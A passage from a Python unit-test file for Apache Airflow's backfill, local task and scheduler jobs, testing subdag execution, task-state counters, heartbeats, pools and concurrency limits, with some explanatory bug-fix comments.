success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
    def test_sub_set_subdag(self):
        '''Backfilling a sub_dag replaces the original DagRun's run_id and only
        executes the tasks matched by the regex.'''
        dag = DAG(
            'test_sub_set_subdag',
            start_date=DEFAULT_DATE,
            default_args={'owner': 'owner1'})

        with dag:
            op1 = DummyOperator(task_id='leave1')
            op2 = DummyOperator(task_id='leave2')
            op3 = DummyOperator(task_id='upstream_level_1')
            op4 = DummyOperator(task_id='upstream_level_2')
            op5 = DummyOperator(task_id='upstream_level_3')
            # order randomly
            op2.set_downstream(op3)
            op1.set_downstream(op3)
            op4.set_downstream(op5)
            op3.set_downstream(op4)

        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.RUNNING,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE)

        executor = TestExecutor(do_update=True)
        # Only the two 'leave*' tasks are part of the sub DAG.
        sub_dag = dag.sub_dag(task_regex="leave*",
                              include_downstream=False,
                              include_upstream=False)
        job = BackfillJob(dag=sub_dag,
                          start_date=DEFAULT_DATE,
                          end_date=DEFAULT_DATE,
                          executor=executor)
        job.run()

        self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
        # the run_id should have changed, so a refresh won't work
        drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
        dr = drs[0]

        self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
                         dr.run_id)
        for ti in dr.get_task_instances():
            # Matched tasks ran; everything else was left untouched.
            if ti.task_id == 'leave1' or ti.task_id == 'leave2':
                self.assertEqual(State.SUCCESS, ti.state)
            else:
                self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
    """Backfill over a dag run with mixed pre-existing TI states: the
    runnable ones are executed, terminal ones are left alone, and the
    pre-existing failure makes the backfill (and dag run) fail."""
    dag = DAG(
        'test_backfill_fill_blanks',
        start_date=DEFAULT_DATE,
        default_args={'owner': 'owner1'},
    )
    with dag:
        op1 = DummyOperator(task_id='op1')
        op2 = DummyOperator(task_id='op2')
        op3 = DummyOperator(task_id='op3')
        op4 = DummyOperator(task_id='op4')
        op5 = DummyOperator(task_id='op5')
        op6 = DummyOperator(task_id='op6')
    dag.clear()
    dr = dag.create_dagrun(run_id='test',
                           state=State.RUNNING,
                           execution_date=DEFAULT_DATE,
                           start_date=DEFAULT_DATE)
    executor = TestExecutor(do_update=True)
    session = settings.Session()
    # Seed each task instance with a different starting state.
    tis = dr.get_task_instances()
    for ti in tis:
        if ti.task_id == op1.task_id:
            ti.state = State.UP_FOR_RETRY
            ti.end_date = DEFAULT_DATE
        elif ti.task_id == op2.task_id:
            ti.state = State.FAILED
        elif ti.task_id == op3.task_id:
            ti.state = State.SKIPPED
        elif ti.task_id == op4.task_id:
            ti.state = State.SCHEDULED
        elif ti.task_id == op5.task_id:
            ti.state = State.UPSTREAM_FAILED
        # op6 = None
        session.merge(ti)
    session.commit()
    session.close()
    job = BackfillJob(dag=dag,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE,
                      executor=executor)
    # The pre-existing FAILED ti (op2) makes the whole backfill fail.
    self.assertRaisesRegexp(
        AirflowException,
        'Some task instances failed',
        job.run)
    self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
    # the run_id should have changed, so a refresh won't work
    drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
    dr = drs[0]
    self.assertEqual(dr.state, State.FAILED)
    # Runnable states (retry, scheduled, none) got executed to SUCCESS;
    # terminal states (failed, skipped, upstream_failed) are unchanged.
    tis = dr.get_task_instances()
    for ti in tis:
        if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
            self.assertEqual(ti.state, State.SUCCESS)
        elif ti.task_id == op2.task_id:
            self.assertEqual(ti.state, State.FAILED)
        elif ti.task_id == op3.task_id:
            self.assertEqual(ti.state, State.SKIPPED)
        elif ti.task_id == op5.task_id:
            self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
    """Backfilling a subdag directly executes each of its tasks."""
    dag = self.dagbag.get_dag('example_subdag_operator')
    subdag_op_task = dag.get_task('section-1')
    subdag = subdag_op_task.subdag
    subdag.schedule_interval = '@daily'
    start_date = timezone.utcnow()
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=subdag,
                      start_date=start_date,
                      end_date=start_date,
                      executor=executor,
                      donot_pickle=True)
    job.run()
    history = executor.history
    subdag_history = history[0]
    # check that all 5 task instances of the subdag 'section-1' were executed
    self.assertEqual(5, len(subdag_history))
    for sdh in subdag_history:
        # index 3 of the executor history entry holds the TaskInstance
        ti = sdh[3]
        self.assertIn('section-1-task-', ti.task_id)
    subdag.clear()
    dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
    """Clearing a sub-DAG task with ``include_parentdag=True`` must also
    clear the parent DAG's downstream tasks."""
    dag = self.dagbag.get_dag('example_subdag_operator')
    subdag_op_task = dag.get_task('section-1')
    subdag = subdag_op_task.subdag
    subdag.schedule_interval = '@daily'
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=subdag,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE,
                      executor=executor,
                      donot_pickle=True)
    with timeout(seconds=30):
        job.run()
    ti0 = TI(
        task=subdag.get_task('section-1-task-1'),
        execution_date=DEFAULT_DATE)
    ti0.refresh_from_db()
    self.assertEqual(ti0.state, State.SUCCESS)
    sdag = subdag.sub_dag(
        task_regex='section-1-task-1',
        include_downstream=True,
        include_upstream=False)
    sdag.clear(
        start_date=DEFAULT_DATE,
        end_date=DEFAULT_DATE,
        include_parentdag=True)
    ti0.refresh_from_db()
    self.assertEqual(State.NONE, ti0.state)
    ti1 = TI(
        task=dag.get_task('some-other-task'),
        execution_date=DEFAULT_DATE)
    # BUGFIX: the original never refreshed ti1 (nor the downstream TIs
    # below) from the DB, so the State.NONE assertions were vacuously
    # true -- a freshly constructed TI starts out with no state.
    ti1.refresh_from_db()
    self.assertEqual(State.NONE, ti1.state)
    # Checks that all the Downstream tasks for Parent DAG
    # have been cleared
    for task in subdag_op_task.downstream_list:
        ti = TI(
            task=dag.get_task(task.task_id),
            execution_date=DEFAULT_DATE
        )
        ti.refresh_from_db()
        self.assertEqual(State.NONE, ti.state)
    subdag.clear()
    dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
    """
    Ensure that subdag operators execute properly in the case where
    an associated task of the subdag has been removed from the dag
    definition, but has instances in the database from previous runs.
    """
    dag = self.dagbag.get_dag('example_subdag_operator')
    subdag = dag.get_task('section-1').subdag
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=subdag,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE,
                      executor=executor,
                      donot_pickle=True)
    # Simulate a task that exists only in the DB (already REMOVED),
    # not in the current dag definition.
    removed_task_ti = TI(
        task=DummyOperator(task_id='removed_task'),
        execution_date=DEFAULT_DATE,
        state=State.REMOVED)
    removed_task_ti.dag_id = subdag.dag_id
    session = settings.Session()
    session.merge(removed_task_ti)
    with timeout(seconds=30):
        job.run()
    # Every task still present in the dag definition ran to success.
    for task in subdag.tasks:
        instance = session.query(TI).filter(
            TI.dag_id == subdag.dag_id,
            TI.task_id == task.task_id,
            TI.execution_date == DEFAULT_DATE).first()
        self.assertIsNotNone(instance)
        self.assertEqual(instance.state, State.SUCCESS)
    # The stale instance keeps its REMOVED state.
    removed_task_ti.refresh_from_db()
    self.assertEqual(removed_task_ti.state, State.REMOVED)
    subdag.clear()
    dag.clear()
def test_update_counters(self):
    """_update_counters must move a finished TI out of ``running`` and
    into the bucket matching its terminal state, or back into ``to_run``
    for retry / reschedule / none."""
    dag = DAG(
        dag_id='test_manage_executor_state',
        start_date=DEFAULT_DATE)
    task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    job = BackfillJob(dag=dag)
    session = settings.Session()
    dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
                           state=State.RUNNING,
                           execution_date=DEFAULT_DATE,
                           start_date=DEFAULT_DATE,
                           session=session)
    ti = TI(task1, dr.execution_date)
    ti.refresh_from_db()
    ti_status = BackfillJob._DagRunTaskStatus()

    def _assert_counts(running=0, succeeded=0, skipped=0, failed=0, to_run=0):
        # assertEqual (instead of assertTrue(len(...) == n)) gives a
        # useful message when a bucket has the wrong size.
        self.assertEqual(running, len(ti_status.running))
        self.assertEqual(succeeded, len(ti_status.succeeded))
        self.assertEqual(skipped, len(ti_status.skipped))
        self.assertEqual(failed, len(ti_status.failed))
        self.assertEqual(to_run, len(ti_status.to_run))

    # test for success
    ti.set_state(State.SUCCESS, session)
    ti_status.running[ti.key] = ti
    job._update_counters(ti_status=ti_status)
    _assert_counts(succeeded=1)
    ti_status.succeeded.clear()
    # test for skipped
    ti.set_state(State.SKIPPED, session)
    ti_status.running[ti.key] = ti
    job._update_counters(ti_status=ti_status)
    _assert_counts(skipped=1)
    ti_status.skipped.clear()
    # test for failed
    ti.set_state(State.FAILED, session)
    ti_status.running[ti.key] = ti
    job._update_counters(ti_status=ti_status)
    _assert_counts(failed=1)
    ti_status.failed.clear()
    # retry, reschedule and none must all land back in to_run
    for state in (State.UP_FOR_RETRY, State.UP_FOR_RESCHEDULE, State.NONE):
        ti.set_state(state, session)
        ti_status.running[ti.key] = ti
        job._update_counters(ti_status=ti_status)
        _assert_counts(to_run=1)
        ti_status.to_run.clear()
    session.close()
def test_dag_get_run_dates(self):
    """DAG.get_run_dates honours schedule_interval when expanding a
    [start_date, end_date] window into individual run dates."""

    def make_dag(schedule_interval=None):
        backfill_dag = DAG(
            dag_id='test_get_dates',
            start_date=DEFAULT_DATE,
            schedule_interval=schedule_interval)
        DummyOperator(
            task_id='dummy',
            dag=backfill_dag,
            owner='airflow',
        )
        return backfill_dag

    # No schedule: a single-point window yields exactly one run date.
    self.assertEqual(
        [DEFAULT_DATE],
        make_dag().get_run_dates(start_date=DEFAULT_DATE,
                                 end_date=DEFAULT_DATE))
    # @hourly over a three-hour window yields four run dates.
    hourly_dag = make_dag(schedule_interval="@hourly")
    expected = [DEFAULT_DATE - datetime.timedelta(hours=h)
                for h in (3, 2, 1, 0)]
    self.assertEqual(
        expected,
        hourly_dag.get_run_dates(
            start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
            end_date=DEFAULT_DATE))
def test_backfill_run_backwards(self):
    """With ``run_backwards=True`` the latest execution date must be
    queued first, and every task instance must still succeed."""
    dag = self.dagbag.get_dag("test_start_date_scheduling")
    dag.clear()
    job = BackfillJob(
        dag=dag,
        start_date=DEFAULT_DATE,
        end_date=DEFAULT_DATE + datetime.timedelta(days=1),
        run_backwards=True
    )
    job.run()
    session = settings.Session()
    # BUGFIX: the original combined the two conditions with the Python
    # ``and`` operator, which evaluates to just the second clause, so the
    # dag_id filter was silently dropped.  SQLAlchemy criteria must be
    # passed as separate filter() arguments (implicit AND) or joined
    # with ``&`` / and_().
    tis = session.query(TI).filter(
        TI.dag_id == 'test_start_date_scheduling',
        TI.task_id == 'dummy',
    ).order_by(TI.execution_date).all()
    # Queue timestamps must be in reverse-chronological order.
    queued_times = [ti.queued_dttm for ti in tis]
    self.assertTrue(queued_times == sorted(queued_times, reverse=True))
    self.assertTrue(all([ti.state == State.SUCCESS for ti in tis]))
    dag.clear()
    session.close()
class LocalTaskJobTest(unittest.TestCase):
    """Tests for LocalTaskJob, the job that supervises a single running
    task instance and heartbeats on its behalf."""

    def setUp(self):
        pass

    def test_localtaskjob_essential_attr(self):
        """
        Check whether essential attributes
        of LocalTaskJob can be assigned with
        proper values without intervention
        """
        dag = DAG(
            'test_localtaskjob_essential_attr',
            start_date=DEFAULT_DATE,
            default_args={'owner': 'owner1'})
        with dag:
            op1 = DummyOperator(task_id='op1')
        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.SUCCESS,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE)
        ti = dr.get_task_instance(task_id=op1.task_id)
        job1 = LocalTaskJob(task_instance=ti,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())
        essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
        # Every essential attribute exists and none is left unset.
        check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
        self.assertTrue(all(check_result_1))
        check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
        self.assertTrue(all(check_result_2))

    @patch('os.getpid')
    def test_localtaskjob_heartbeat(self, mock_pid):
        """heartbeat_callback raises when the hostname or pid recorded on
        the task instance does not match the current process."""
        session = settings.Session()
        dag = DAG(
            'test_localtaskjob_heartbeat',
            start_date=DEFAULT_DATE,
            default_args={'owner': 'owner1'})
        with dag:
            op1 = DummyOperator(task_id='op1')
        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.SUCCESS,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE,
                               session=session)
        ti = dr.get_task_instance(task_id=op1.task_id, session=session)
        ti.state = State.RUNNING
        ti.hostname = "blablabla"
        session.commit()
        job1 = LocalTaskJob(task_instance=ti,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())
        # Hostname recorded on the TI differs from ours -> failure.
        self.assertRaises(AirflowException, job1.heartbeat_callback)
        mock_pid.return_value = 1
        ti.state = State.RUNNING
        ti.hostname = get_hostname()
        ti.pid = 1
        session.merge(ti)
        session.commit()
        # Hostname and pid both match -> callback succeeds quietly.
        ret = job1.heartbeat_callback()
        self.assertEqual(ret, None)
        # Recorded pid no longer matches the current process -> failure.
        mock_pid.return_value = 2
        self.assertRaises(AirflowException, job1.heartbeat_callback)

    @unittest.skipIf('mysql' in configuration.conf.get('core', 'sql_alchemy_conn'),
                     "flaky when run on mysql")
    @unittest.skipIf('postgresql' in configuration.conf.get('core', 'sql_alchemy_conn'),
                     'flaky when run on postgresql')
    def test_mark_success_no_kill(self):
        """
        Test that ensures that mark_success in the UI doesn't cause
        the task to fail, and that the task exits
        """
        dagbag = models.DagBag(
            dag_folder=TEST_DAG_FOLDER,
            include_examples=False,
        )
        dag = dagbag.dags.get('test_mark_success')
        task = dag.get_task('task1')
        session = settings.Session()
        dag.clear()
        dag.create_dagrun(run_id="test",
                          state=State.RUNNING,
                          execution_date=DEFAULT_DATE,
                          start_date=DEFAULT_DATE,
                          session=session)
        ti = TI(task=task, execution_date=DEFAULT_DATE)
        ti.refresh_from_db()
        job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
        # Run the job in a separate process so the TI can be marked
        # successful "from the outside" while it is running.
        process = multiprocessing.Process(target=job1.run)
        process.start()
        ti.refresh_from_db()
        # Poll (up to ~5s) until the task instance reaches RUNNING.
        for i in range(0, 50):
            if ti.state == State.RUNNING:
                break
            time.sleep(0.1)
            ti.refresh_from_db()
        self.assertEqual(State.RUNNING, ti.state)
        # Simulate the UI's "mark success" action.
        ti.state = State.SUCCESS
        session.merge(ti)
        session.commit()
        # The supervising job should notice and exit without failing the TI.
        process.join(timeout=10)
        self.assertFalse(process.is_alive())
        ti.refresh_from_db()
        self.assertEqual(State.SUCCESS, ti.state)

    def test_localtaskjob_double_trigger(self):
        """A task instance already recorded as running elsewhere must not
        be started a second time."""
        dagbag = models.DagBag(
            dag_folder=TEST_DAG_FOLDER,
            include_examples=False,
        )
        dag = dagbag.dags.get('test_localtaskjob_double_trigger')
        task = dag.get_task('test_localtaskjob_double_trigger_task')
        session = settings.Session()
        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.SUCCESS,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE,
                               session=session)
        ti = dr.get_task_instance(task_id=task.task_id, session=session)
        ti.state = State.RUNNING
        ti.hostname = get_hostname()
        ti.pid = 1
        session.commit()
        ti_run = TI(task=task, execution_date=DEFAULT_DATE)
        job1 = LocalTaskJob(task_instance=ti_run,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())
        # The task runner must never be started for the duplicate trigger.
        with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
            job1.run()
            mock_method.assert_not_called()
        # The state of the original run is untouched.
        ti = dr.get_task_instance(task_id=task.task_id, session=session)
        self.assertEqual(ti.pid, 1)
        self.assertEqual(ti.state, State.RUNNING)
        session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
    """Wipe all scheduler-related tables so each test starts clean."""
    tables = (models.DagRun, models.TaskInstance, models.Pool,
              models.DagModel, SlaMiss, errors.ImportError)
    with create_session() as session:
        for table in tables:
            session.query(table).delete()
        session.commit()
@classmethod
def setUpClass(cls):
    # Parse the dag folder once for the whole test class.
    cls.dagbag = DagBag()

    def getboolean(section, key):
        # Force load_examples off regardless of the local airflow.cfg so
        # the scheduler under test does not pick up the example dags.
        if section.lower() == 'core' and key.lower() == 'load_examples':
            return False
        else:
            return configuration.conf.getboolean(section, key)

    # Patch is undone in tearDownClass.
    cls.patcher = mock.patch('airflow.jobs.conf.getboolean')
    mock_getboolean = cls.patcher.start()
    mock_getboolean.side_effect = getboolean
@classmethod
def tearDownClass(cls):
    # Undo the conf.getboolean patch installed in setUpClass.
    cls.patcher.stop()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
    """
    Utility function that runs a single scheduler loop without actually
    changing/scheduling any dags. This is useful to simulate the other side effects of
    running a scheduler loop, e.g. to see what parse errors there are in the
    dags_folder.

    :param dags_folder: the directory to traverse
    :type dags_folder: str
    """
    scheduler = SchedulerJob(
        dag_id='this_dag_doesnt_exist',  # We don't want to actually run anything
        num_runs=1,
        subdir=os.path.join(dags_folder))
    # No pause between heartbeats so the single run finishes quickly.
    scheduler.heartrate = 0
    scheduler.run()
def _make_simple_dag_bag(self, dags):
    """Wrap each DAG in a SimpleDag and bundle them into a SimpleDagBag."""
    return SimpleDagBag(list(map(SimpleDag, dags)))
def test_no_orphan_process_will_be_left(self):
    """A scheduler run must not leave orphaned child processes behind."""
    empty_dir = mkdtemp()
    current_process = psutil.Process()
    old_children = current_process.children(recursive=True)
    try:
        scheduler = SchedulerJob(subdir=empty_dir,
                                 num_runs=1)
        scheduler.executor = TestExecutor()
        scheduler.run()
    finally:
        # ROBUSTNESS: clean the temp dir up even when scheduler.run()
        # raises, so a failing test does not litter the filesystem.
        shutil.rmtree(empty_dir)
    # Remove potential noise created by previous tests.
    current_children = set(current_process.children(recursive=True)) - set(
        old_children)
    self.assertFalse(current_children)
def test_process_executor_events(self):
    """Executor events are only applied to TIs whose dag is present in
    the SimpleDagBag handed to _process_executor_events."""
    dag_id = "test_process_executor_events"
    dag_id2 = "test_process_executor_events_2"
    task_id_1 = 'dummy_task'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    DummyOperator(dag=dag2, task_id=task_id_1)
    dagbag1 = self._make_simple_dag_bag([dag])
    dagbag2 = self._make_simple_dag_bag([dag2])
    scheduler = SchedulerJob()
    session = settings.Session()
    ti1 = TI(task1, DEFAULT_DATE)
    ti1.state = State.QUEUED
    session.merge(ti1)
    session.commit()
    executor = TestExecutor()
    executor.event_buffer[ti1.key] = State.FAILED
    scheduler.executor = executor
    # dag bag does not contain dag_id
    scheduler._process_executor_events(simple_dag_bag=dagbag2)
    ti1.refresh_from_db()
    self.assertEqual(ti1.state, State.QUEUED)
    # dag bag does contain dag_id
    scheduler._process_executor_events(simple_dag_bag=dagbag1)
    ti1.refresh_from_db()
    self.assertEqual(ti1.state, State.FAILED)
    # An event for a TI that already moved on (SUCCESS) is a no-op.
    ti1.state = State.SUCCESS
    session.merge(ti1)
    session.commit()
    executor.event_buffer[ti1.key] = State.SUCCESS
    scheduler._process_executor_events(simple_dag_bag=dagbag1)
    ti1.refresh_from_db()
    self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
    """Task instances belonging to a paused dag must stay SCHEDULED."""
    dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
    task_id_1 = 'dummy_task'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    ti1 = TI(task1, DEFAULT_DATE)
    ti1.state = State.SCHEDULED
    dr1.state = State.RUNNING
    # Mark the dag itself as paused in the metadata DB.
    dagmodel = models.DagModel()
    dagmodel.dag_id = dag_id
    dagmodel.is_paused = True
    session.merge(ti1)
    session.merge(dr1)
    session.add(dagmodel)
    session.commit()
    scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    ti1.refresh_from_db()
    # Unchanged: the scheduler must skip paused dags.
    self.assertEqual(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
    """
    Tests that tasks without dagrun still get executed.
    """
    dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
    task_id_1 = 'dummy_task'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    scheduler.create_dag_run(dag)
    ti1 = TI(task1, DEFAULT_DATE)
    ti1.state = State.SCHEDULED
    # Shift the execution date so the TI no longer matches any dag run.
    ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
    session.merge(ti1)
    session.commit()
    scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    ti1.refresh_from_db()
    self.assertEqual(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
    """
    Tests that backfill tasks won't get executed.
    """
    dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
    task_id_1 = 'dummy_task'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    # A backfill-prefixed run_id marks the dag run as a backfill run.
    dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
    ti1 = TI(task1, dr1.execution_date)
    ti1.refresh_from_db()
    ti1.state = State.SCHEDULED
    session.merge(ti1)
    session.merge(dr1)
    session.commit()
    self.assertTrue(dr1.is_backfill)
    scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    ti1.refresh_from_db()
    # The scheduler must leave backfill-owned tasks alone.
    self.assertEqual(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
    """TIs from backfill dag runs are excluded; TIs without any dag run
    and TIs from normal dag runs are executable."""
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    # Turn the second run into a backfill run via its run_id prefix.
    dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
    ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
    ti_backfill = TI(task1, dr2.execution_date)
    ti_with_dagrun = TI(task1, dr1.execution_date)
    # ti_with_paused
    ti_no_dagrun.state = State.SCHEDULED
    ti_backfill.state = State.SCHEDULED
    ti_with_dagrun.state = State.SCHEDULED
    session.merge(dr2)
    session.merge(ti_no_dagrun)
    session.merge(ti_backfill)
    session.merge(ti_with_dagrun)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(2, len(res))
    # BUGFIX: was ``map(...)`` -- a one-shot iterator in Python 3.  The
    # first assertIn consumed it up to the match, so the second assertIn
    # only searched the remaining elements and silently depended on the
    # ordering of ``res``.  Materialize the keys into a list instead.
    res_keys = [ti.key for ti in res]
    self.assertIn(ti_no_dagrun.key, res_keys)
    self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
    """Pool slots cap how many SCHEDULED task instances are picked up."""
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task1 = DummyOperator(dag=dag, task_id='dummy', pool='a')
    task2 = DummyOperator(dag=dag, task_id='dummydummy', pool='b')
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    tis = [
        TI(task1, dr1.execution_date),
        TI(task2, dr1.execution_date),
        TI(task1, dr2.execution_date),
        TI(task2, dr2.execution_date),
    ]
    for ti in tis:
        ti.state = State.SCHEDULED
        session.merge(ti)
    # Pool 'a' has a single slot while pool 'b' has plenty.
    session.add(models.Pool(pool='a', slots=1, description='haha'))
    session.add(models.Pool(pool='b', slots=100, description='haha'))
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    session.commit()
    # Only one of the two pool-'a' tasks fits; both 'b' tasks do.
    self.assertEqual(3, len(res))
    res_keys = [ti.key for ti in res]
    self.assertIn(tis[0].key, res_keys)
    self.assertIn(tis[1].key, res_keys)
    self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
    """A task pointing at an undefined pool is never picked up."""
    dag_id = 'SchedulerJobTest.test_nonexistent_pool'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task = DummyOperator(dag=dag, task_id='dummy_wrong_pool',
                         pool="this_pool_doesnt_exist")
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dag_run = scheduler.create_dag_run(dag)
    ti = TI(task, dag_run.execution_date)
    ti.state = State.SCHEDULED
    session.merge(ti)
    session.commit()
    executable = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    session.commit()
    self.assertEqual(0, len(executable))
def test_find_executable_task_instances_none(self):
    """With no task instance in the requested states nothing is found."""
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    DummyOperator(dag=dag, task_id='dummy')
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    scheduler.create_dag_run(dag)
    session.commit()
    executable = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(0, len(executable))
def test_find_executable_task_instances_concurrency(self):
    """Dag-level ``concurrency`` caps how many TIs are picked up."""
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
    task1 = DummyOperator(dag=dag, task_id='dummy')
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    runs = [scheduler.create_dag_run(dag) for _ in range(3)]
    ti1, ti2, ti3 = [TI(task1, run.execution_date) for run in runs]
    # One TI already running leaves room for exactly one more.
    ti1.state = State.RUNNING
    ti2.state = State.SCHEDULED
    ti3.state = State.SCHEDULED
    for ti in (ti1, ti2, ti3):
        session.merge(ti)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(1, len(res))
    self.assertIn(ti2.key, [ti.key for ti in res])
    # With two TIs running the concurrency limit of 2 is exhausted.
    ti2.state = State.RUNNING
    session.merge(ti2)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
    """QUEUED task instances also count against dag concurrency."""
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
    task1 = DummyOperator(dag=dag, task_id='dummy1')
    task2 = DummyOperator(dag=dag, task_id='dummy2')
    task3 = DummyOperator(dag=dag, task_id='dummy3')
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dag_run = scheduler.create_dag_run(dag)
    ti1 = TI(task1, dag_run.execution_date)
    ti2 = TI(task2, dag_run.execution_date)
    ti3 = TI(task3, dag_run.execution_date)
    # One RUNNING plus one QUEUED leaves a single free concurrency slot.
    ti1.state = State.RUNNING
    ti2.state = State.QUEUED
    ti3.state = State.SCHEDULED
    session.merge(ti1)
    session.merge(ti2)
    session.merge(ti3)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(1, len(res))
    self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
    """Per-task ``task_concurrency`` limits how many instances of one
    task may run at once, independently of the dag-level limit."""
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
    task_id_1 = 'dummy'
    task_id_2 = 'dummy2'
